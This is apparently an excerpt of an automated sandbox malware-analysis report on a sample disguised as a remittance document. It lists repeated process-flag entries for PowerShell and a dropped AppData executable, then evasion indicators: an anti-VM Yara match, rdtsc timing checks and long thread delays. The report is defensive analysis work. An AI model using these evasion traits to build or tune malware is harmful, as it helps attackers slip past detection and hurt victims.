            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\winver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: 4TH HIRE SOA REMITTANCE_USD280,000.exe PID: 7112, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: GRogNEHvcL.exe PID: 7280, type: MEMORYSTR
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeMemory allocated: E30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeMemory allocated: 4830000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeMemory allocated: 87B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeMemory allocated: 6BF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeMemory allocated: 98B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeMemory allocated: A8B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeMemory allocated: 1190000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeMemory allocated: 2B40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeMemory allocated: 8560000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeMemory allocated: 9560000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeMemory allocated: 84D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017D096E rdtsc 9_2_017D096E
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4439Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5264Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 486Jump to behavior
            Source: C:\Windows\SysWOW64\winver.exeWindow / User API: threadDelayed 9781
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeAPI coverage: 0.7 %
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeAPI coverage: 0.2 %
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe TID: 5760Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5020Thread sleep count: 4439 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4280Thread sleep count: 252 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7216Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe TID: 7404Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\winver.exe TID: 7868Thread sleep count: 189 > 30
            Source: C:\Windows\SysWOW64\winver.exe TID: 7868Thread sleep time: -378000s >= -30000s
            Source: C:\Windows\SysWOW64\winver.exe TID: 7868Thread sleep count: 9781 > 30
            Source: C:\Windows\SysWOW64\winver.exe TID: 7868Thread sleep time: -19562000s >= -30000s
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe TID: 7940Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe TID: 7940Thread sleep count: 40 > 30
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe TID: 7940Thread sleep time: -60000s >= -30000s
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe TID: 7940Thread sleep count: 40 > 30
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe TID: 7940Thread sleep time: -40000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\winver.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeThread delayed: delay time: 922337203685477Jump to behavior
